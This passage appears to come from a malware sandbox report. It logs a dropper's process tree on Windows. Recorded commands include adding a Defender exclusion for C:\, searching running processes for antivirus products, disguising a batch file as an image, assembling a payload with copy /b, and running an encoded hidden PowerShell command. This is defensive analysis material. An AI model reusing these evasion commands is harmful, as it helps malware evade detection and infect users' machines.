        powershell Add-MpPreference -ExclusionPath C:\
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Remove-MpPreference -ExclusionPath C:\
        7⤵
        
        PID:15252
      - C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        6⤵
        
        PID:31560
        
        C:\Users\Admin\AppData\Local\Temp\{b2f48fda-f52d-4d72-b9a5-122f5cd267ed}\4c703fa3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{b2f48fda-f52d-4d72-b9a5-122f5cd267ed}\4c703fa3.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
        7⤵
        
        PID:23696
        
        C:\Users\Admin\AppData\Local\Temp\{5c1fc9f9-db22-4645-8aad-30fd1db49708}\7325df01.exe
        
        C:/Users/Admin/AppData/Local/Temp/{5c1fc9f9-db22-4645-8aad-30fd1db49708}/\7325df01.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
        8⤵
        
        PID:6192
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10484281121\ccosvAs.cmd"
      4⤵
      PID:11260
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10484281121\ccosvAs.cmd"
        5⤵
        
        PID:27828
  - - C:\Users\Admin\AppData\Local\Temp\10484290101\Rm3cVPI.exe
      "C:\Users\Admin\AppData\Local\Temp\10484290101\Rm3cVPI.exe"
      4⤵
      PID:5160
  - - C:\Users\Admin\AppData\Local\Temp\10484300101\pered.exe
      "C:\Users\Admin\AppData\Local\Temp\10484300101\pered.exe"
      4⤵
      PID:18788
  - - C:\Users\Admin\AppData\Local\Temp\10484310101\ibC8xs1.exe
      "C:\Users\Admin\AppData\Local\Temp\10484310101\ibC8xs1.exe"
      4⤵
      PID:11760
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\eddgafji\eddgafji.cmdline"
        5⤵
        
        PID:13888
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7146.tmp" "c:\Users\Admin\AppData\Local\Temp\eddgafji\CSC861BD293D44411297A3E75042309C6A.TMP"
        6⤵
        
        PID:6124
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:6532
  - - C:\Users\Admin\AppData\Local\Temp\10484320101\d32bfc484b.exe
      "C:\Users\Admin\AppData\Local\Temp\10484320101\d32bfc484b.exe"
      4⤵
      PID:29680
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 29680 -s 756
        5⤵
        Program crash
        
        PID:13780
  - - C:\Users\Admin\AppData\Local\Temp\10484330101\mtCxnCB.exe
      "C:\Users\Admin\AppData\Local\Temp\10484330101\mtCxnCB.exe"
      4⤵
      PID:20212
  - - C:\Users\Admin\AppData\Local\Temp\10484340101\Cheeto.exe
      "C:\Users\Admin\AppData\Local\Temp\10484340101\Cheeto.exe"
      4⤵
      PID:13848
  - - C:\Users\Admin\AppData\Local\Temp\10484350101\AfkeY2q.exe
      "C:\Users\Admin\AppData\Local\Temp\10484350101\AfkeY2q.exe"
      4⤵
      PID:6960
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        5⤵
        
        PID:1164
  - - C:\Users\Admin\AppData\Local\Temp\10484360101\DgQBvwg.exe
      "C:\Users\Admin\AppData\Local\Temp\10484360101\DgQBvwg.exe"
      4⤵
      PID:10208
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\45ghoj5f\45ghoj5f.cmdline"
        5⤵
        
        PID:13924
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES73C6.tmp" "c:\Users\Admin\AppData\Local\Temp\45ghoj5f\CSC5233B20ED9D54B528B9735E6AC4570.TMP"
        6⤵
        
        PID:8904
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:10284
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:23656
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:23592
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:31348
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:7864
  - - C:\Users\Admin\AppData\Local\Temp\10484370101\larBxd7.exe
      "C:\Users\Admin\AppData\Local\Temp\10484370101\larBxd7.exe"
      4⤵
      PID:23916
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy Cattle.psd Cattle.psd.bat & Cattle.psd.bat
        5⤵
        
        PID:32328
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:14312
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        6⤵
        
        PID:14344
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:30256
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        6⤵
        
        PID:30540
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 689912
        6⤵
        
        PID:17688
      - C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Exclusion.psd
        6⤵
        
        PID:11664
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "users" Findarticles
        6⤵
        
        PID:5576
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 689912\Jordan.com + Bg + Batteries + Boss + Illustrations + Boards + Within + Pushed + Brunei + Dead 689912\Jordan.com
        6⤵
        
        PID:5176
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Customized.psd + ..\Permits.psd + ..\Teeth.psd + ..\Feel.psd + ..\Nonprofit.psd + ..\Shoes.psd + ..\Bruce.psd b
        6⤵
        
        PID:9952
      - C:\Users\Admin\AppData\Local\Temp\689912\Jordan.com
        
        Jordan.com b
        6⤵
        
        PID:1512
      - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        6⤵
        
        PID:15128
  - - C:\Users\Admin\AppData\Local\Temp\10484380101\9sWdA2p.exe
      "C:\Users\Admin\AppData\Local\Temp\10484380101\9sWdA2p.exe"
      4⤵
      PID:13252
  - - C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10484390271\ArFLIYD.msi" /quiet
      4⤵
      PID:14428
  - - C:\Users\Admin\AppData\Local\Temp\10484400101\LJl8AAr.exe
      "C:\Users\Admin\AppData\Local\Temp\10484400101\LJl8AAr.exe"
      4⤵
      PID:19356
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:18520
  - - C:\Users\Admin\AppData\Local\Temp\10484410101\PsafxoF.exe
      "C:\Users\Admin\AppData\Local\Temp\10484410101\PsafxoF.exe"
      4⤵
      PID:13752
    - - C:\Users\Admin\AppData\Local\Temp\3114b4b57c\tgvazx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3114b4b57c\tgvazx.exe"
        5⤵
        
        PID:14840
  - - C:\Users\Admin\AppData\Local\Temp\10484420101\PsafxoF.exe
      "C:\Users\Admin\AppData\Local\Temp\10484420101\PsafxoF.exe"
      4⤵
      PID:29120
  - - C:\Users\Admin\AppData\Local\Temp\10484430101\5Jq9U1v.exe
      "C:\Users\Admin\AppData\Local\Temp\10484430101\5Jq9U1v.exe"
      4⤵
      PID:17528
  - - C:\Users\Admin\AppData\Local\Temp\10484440101\amnew.exe
      "C:\Users\Admin\AppData\Local\Temp\10484440101\amnew.exe"
      4⤵
      PID:27928
  - - C:\Users\Admin\AppData\Local\Temp\10484450101\qhjMWht.exe
      "C:\Users\Admin\AppData\Local\Temp\10484450101\qhjMWht.exe"
      4⤵
      PID:22020
  - - C:\Users\Admin\AppData\Local\Temp\10484460101\n0hEgR9.exe
      "C:\Users\Admin\AppData\Local\Temp\10484460101\n0hEgR9.exe"
      4⤵
      PID:13656
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:13796
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:26384
  - - C:\Users\Admin\AppData\Local\Temp\10484470101\3e21317a8a.exe
      "C:\Users\Admin\AppData\Local\Temp\10484470101\3e21317a8a.exe"
      4⤵
      PID:21976
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:15744
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 15744 -s 1368
        6⤵
        Program crash
        
        PID:23868

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:724

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4832

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
1⤵
- Modifies registry class
PID:4032

C:\Windows\System32\Taskmgr.exe
"C:\Windows\System32\Taskmgr.exe"
1⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3876

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4772

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2244

C:\Drivers\pcidrv.exe
C:\Drivers\pcidrv.exe
1⤵
PID:6060

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
PID:3496

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
PID:3636

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:5440

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:5136

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:5932

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:5696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\lweMk87H\9yDeq56oZOpbwpXJ.exe
1⤵
PID:3684
- C:\Users\Admin\AppData\Local\Temp\lweMk87H\9yDeq56oZOpbwpXJ.exe
  C:\Users\Admin\AppData\Local\Temp\lweMk87H\9yDeq56oZOpbwpXJ.exe
  2⤵
  PID:7652
- - C:\Users\Admin\AppData\Local\Temp\24qbnjzr\taOafh2iHMWQB4al.exe
    C:\Users\Admin\AppData\Local\Temp\24qbnjzr\taOafh2iHMWQB4al.exe 7652
    3⤵
    PID:7680
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7680 -s 648
      4⤵
      Program crash
      PID:31596
- - C:\Users\Admin\AppData\Local\Temp\lweMk87H\NlQBiwXIx4CDK6jj.exe
    C:\Users\Admin\AppData\Local\Temp\lweMk87H\NlQBiwXIx4CDK6jj.exe 7652
    3⤵
    PID:8612
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8612 -s 496
      4⤵
      Program crash
      PID:19980
- - C:\Users\Admin\AppData\Local\Temp\lweMk87H\IEPe0t7srRBdpmIs.exe
    C:\Users\Admin\AppData\Local\Temp\lweMk87H\IEPe0t7srRBdpmIs.exe 7652
    3⤵
    PID:11740
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 11740 -s 656
      4⤵
      Program crash
      PID:23232
- - C:\Users\Admin\AppData\Local\Temp\lweMk87H\mtUWLVylQBHkC6Jj.exe
    C:\Users\Admin\AppData\Local\Temp\lweMk87H\mtUWLVylQBHkC6Jj.exe 7652
    3⤵
    PID:15080
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 15080 -s 616
      4⤵
      Program crash
      PID:20476
- - C:\Users\Admin\AppData\Local\Temp\lweMk87H\rOO9QUt27DPdDdNF.exe
    C:\Users\Admin\AppData\Local\Temp\lweMk87H\rOO9QUt27DPdDdNF.exe 7652
    3⤵
    PID:15176
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 15176 -s 680
      4⤵
      Program crash
      PID:29524
- - C:\Users\Admin\AppData\Local\Temp\lweMk87H\6cL4iFhevEsYSXUY.exe
    C:\Users\Admin\AppData\Local\Temp\lweMk87H\6cL4iFhevEsYSXUY.exe 7652
    3⤵
    PID:5688
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 612
      4⤵
      Program crash
      PID:4024
- - C:\Users\Admin\AppData\Local\Temp\lweMk87H\whC0kLkx88ZlSdP3.exe
    C:\Users\Admin\AppData\Local\Temp\lweMk87H\whC0kLkx88ZlSdP3.exe 7652
    3⤵
    PID:15508
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 15508 -s 668
      4⤵
      Program crash
      PID:28192
- - C:\Users\Admin\AppData\Local\Temp\lweMk87H\8hhfr1Xr0ZLClW0o.exe
    C:\Users\Admin\AppData\Local\Temp\lweMk87H\8hhfr1Xr0ZLClW0o.exe 7652
    3⤵
    PID:10372
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 10372 -s 696
      4⤵
      Program crash
      PID:32428
- - C:\Users\Admin\AppData\Local\Temp\lweMk87H\XNCW6zwLclDZLW5g.exe
    C:\Users\Admin\AppData\Local\Temp\lweMk87H\XNCW6zwLclDZLW5g.exe 7652
    3⤵
    PID:5816
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5816 -s 804
      4⤵
      Program crash
      PID:15596
- - C:\Users\Admin\AppData\Local\Temp\lweMk87H\MQEBJVKAcU2UZGia.exe
    C:\Users\Admin\AppData\Local\Temp\lweMk87H\MQEBJVKAcU2UZGia.exe 7652
    3⤵
    PID:30740
- - C:\Users\Admin\AppData\Local\Temp\lweMk87H\qrRVGI2FTuZjMLRT.exe
    C:\Users\Admin\AppData\Local\Temp\lweMk87H\qrRVGI2FTuZjMLRT.exe 7652
    3⤵
    PID:29424
- - C:\Users\Admin\AppData\Local\Temp\lweMk87H\6u21Kp5PPDU0sOn7.exe
    C:\Users\Admin\AppData\Local\Temp\lweMk87H\6u21Kp5PPDU0sOn7.exe 7652
    3⤵
    PID:15032
- - C:\Users\Admin\AppData\Local\Temp\lweMk87H\d9yYmqnST7qTK1ua.exe
    C:\Users\Admin\AppData\Local\Temp\lweMk87H\d9yYmqnST7qTK1ua.exe 7652
    3⤵
    PID:20644

C:\Drivers\pcidrv.exe
C:\Drivers\pcidrv.exe
1⤵
PID:9860

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
PID:12460

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
PID:12480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6516 -ip 6516
1⤵
PID:12532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 7680 -ip 7680
1⤵
PID:18688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 12448 -ip 12448
1⤵
PID:25248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 18664 -ip 18664
1⤵
PID:31520

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:24984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
1⤵
PID:6540
- C:\Windows\explorer.exe
  explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
  2⤵
  PID:31856

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
PID:32008
- C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
  "C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"
  2⤵
  PID:32292
- C:\Users\Admin\AppData\Local\Temp\10483150101\5Jq9U1v.exe
  "C:\Users\Admin\AppData\Local\Temp\10483150101\5Jq9U1v.exe"
  2⤵
  PID:26168
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
    3⤵
    PID:12164

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:32172
- C:\Users\Admin\AppData\Local\Insulin\steamerrorreporter.exe
  "C:\Users\Admin\AppData\Local\Insulin\steamerrorreporter.exe"
  2⤵
  PID:31976
- - C:\Users\Admin\AppData\Roaming\Servicemon\steamerrorreporter.exe
    C:\Users\Admin\AppData\Roaming\Servicemon\steamerrorreporter.exe
    3⤵
    PID:280
  - - C:\Users\Admin\AppData\Local\Temp\remoteBggbv2.exe
      C:\Users\Admin\AppData\Local\Temp\remoteBggbv2.exe
      4⤵
      PID:31032
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\SysWOW64\cmd.exe
      4⤵
      PID:25540
- C:\Users\Admin\AppData\Local\Insulin\steamerrorreporter.exe
  "C:\Users\Admin\AppData\Local\Insulin\steamerrorreporter.exe"
  2⤵
  PID:12736
- - C:\Users\Admin\AppData\Roaming\Servicemon\steamerrorreporter.exe
    C:\Users\Admin\AppData\Roaming\Servicemon\steamerrorreporter.exe
    3⤵
    PID:13408
  - - C:\Users\Admin\AppData\Local\Temp\remoteBggbv2.exe
      C:\Users\Admin\AppData\Local\Temp\remoteBggbv2.exe
      4⤵
      PID:24624
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\SysWOW64\cmd.exe
      4⤵
      PID:29412

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:32072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 8612 -ip 8612
1⤵
PID:20112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3808 -ip 3808
1⤵
PID:31024

C:\Drivers\pcidrv.exe
C:\Drivers\pcidrv.exe
1⤵
PID:31008

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
PID:30472

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
PID:30368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\runtimebroker.exe
1⤵
PID:26212
- C:\Users\Admin\AppData\Roaming\runtimebroker.exe
  C:\Users\Admin\AppData\Roaming\runtimebroker.exe
  2⤵
  PID:25752

C:\Users\Admin\AppData\Roaming\runtimebroker.exe
"C:\Users\Admin\AppData\Roaming\runtimebroker.exe"
1⤵
PID:20056
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
  2⤵
  PID:28820

C:\Drivers\pcidrv.exe
C:\Drivers\pcidrv.exe
1⤵
PID:26512

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
PID:28752

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
PID:27704

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe"
1⤵
PID:11832

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:2240

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
1⤵
PID:11392

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:6476

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:7900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 7852 -ip 7852
1⤵
PID:26856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 11740 -ip 11740
1⤵
PID:23172

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc YQBkAGQALQBtAHAAcAByAEUARgBlAHIAZQBOAGMARQAgAC0ARQBYAEMATABVAFMASQBvAE4AcAByAE8AYwBlAFMAcwAgAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUAIAAtAGYAbwByAEMAZQA=
1⤵
- Command and Scripting Interpreter: PowerShell
PID:10148

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:19816

C:\Drivers\pcidrv.exe
C:\Drivers\pcidrv.exe
1⤵
PID:10924

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
PID:24632

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
PID:19492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 15080 -ip 15080
1⤵
PID:5192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 20452 -ip 20452
1⤵
PID:22932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:14940

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:15040

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
PID:29028

C:\Drivers\pcidrv.exe
C:\Drivers\pcidrv.exe
1⤵
PID:22564

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
PID:21140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 15176 -ip 15176
1⤵
PID:31268

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 30484 -ip 30484
1⤵
PID:14808

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
PID:4820

C:\Drivers\pcidrv.exe
C:\Drivers\pcidrv.exe
1⤵
PID:31796

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
PID:31948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 29680 -ip 29680
1⤵
PID:12624

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\{9bef1506-3c6d-48df-a1bc-bb83176b592d}\d2f1e941-b092-4cea-a174-e1536903c095.cmd"
1⤵
PID:9004
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:23736
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:13332
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:14492
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:28616
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:15756
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:17360
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:31596
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
